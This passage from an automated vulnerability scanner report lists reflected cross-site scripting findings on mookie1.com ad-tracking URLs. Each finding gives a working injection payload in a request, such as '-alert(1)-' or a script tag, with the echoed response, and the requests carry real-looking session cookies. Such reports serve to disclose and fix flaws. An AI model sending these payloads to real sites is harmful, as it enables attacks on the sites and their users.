var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work&21d3c'-alert(1)-'b2c4fcce2af=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.170. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [&_RM_HTML_url_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1048171804@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a36ef'-alert(1)-'8cc5508115d was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1048171804@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/a36ef'-alert(1)-'8cc5508115d&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Home HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; id=2814750682866683; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2043
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
is external preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/a36ef'-alert(1)-'8cc5508115d&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Home';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=330
...[SNIP]...

1.171. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1048171804@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98b8d"><script>alert(1)</script>2d9f50bf1e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis98b8d"><script>alert(1)</script>2d9f50bf1e0/1048171804@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Home HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; id=2814750682866683; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis98b8d"><script>alert(1)</script>2d9f50bf1e0/365523708/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.172. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1048171804@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c6be"><script>alert(1)</script>5a5f3b8395 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1048171804@x546c6be"><script>alert(1)</script>5a5f3b8395?&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Home HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; id=2814750682866683; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 320
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/27172832/x546c6be"><script>alert(1)</script>5a5f3b8395/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG SR
...[SNIP]...

1.173. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [Section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1048171804@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e17dd'-alert(1)-'313b36618a8 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1048171804@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Homee17dd'-alert(1)-'313b36618a8 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; id=2814750682866683; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2043
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...

imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Homee17dd'-alert(1)-'313b36618a8';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.174. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [_RM_HTML_referer_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1048171804@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35c8a'-alert(1)-'c5ba19030b3 was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1048171804@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=35c8a'-alert(1)-'c5ba19030b3&Section=Home HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; id=2814750682866683; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2043
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
t = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=35c8a'-alert(1)-'c5ba19030b3&Section=Home';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
...[SNIP]...

1.175. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [_RM_HTML_title_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1048171804@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a66ac'-alert(1)-'25ed2373604 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1048171804@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliancea66ac'-alert(1)-'25ed2373604&_RM_HTML_referer_=&Section=Home HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; id=2814750682866683; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2099
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
tain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliancea66ac'-alert(1)-'25ed2373604&_RM_HTML_referer_=&Section=Home';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
...[SNIP]...

1.176. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1048171804@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8950f'-alert(1)-'7956232f713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1048171804@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Home&8950f'-alert(1)-'7956232f713=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; id=2814750682866683; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2046
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...

imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Home&8950f'-alert(1)-'7956232f713=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.177. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [&_RM_HTML_url_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1138219538@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28754'-alert(1)-'c4876556689 was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1138219538@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact28754'-alert(1)-'c4876556689&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2032
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
l preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact28754'-alert(1)-'c4876556689&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?
...[SNIP]...

1.178. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1138219538@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 299bb"><script>alert(1)</script>6341c3fb444 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis299bb"><script>alert(1)</script>6341c3fb444/1138219538@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis299bb"><script>alert(1)</script>6341c3fb444/697773924/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.179. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1138219538@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62833"><script>alert(1)</script>de33a4e6f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1138219538@x5462833"><script>alert(1)</script>de33a4e6f7?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 321
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/620690805/x5462833"><script>alert(1)</script>de33a4e6f7/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG S
...[SNIP]...

1.180. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [Section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1138219538@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e00eb'-alert(1)-'7338c475611 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1138219538@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contacte00eb'-alert(1)-'7338c475611 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2032
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...

imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contacte00eb'-alert(1)-'7338c475611';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.181. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [_RM_HTML_referer_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1138219538@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b0bb'-alert(1)-'767bb6c09a8 was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1138219538@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact8b0bb'-alert(1)-'767bb6c09a8&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2032
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
= new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact8b0bb'-alert(1)-'767bb6c09a8&Section=Contact';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
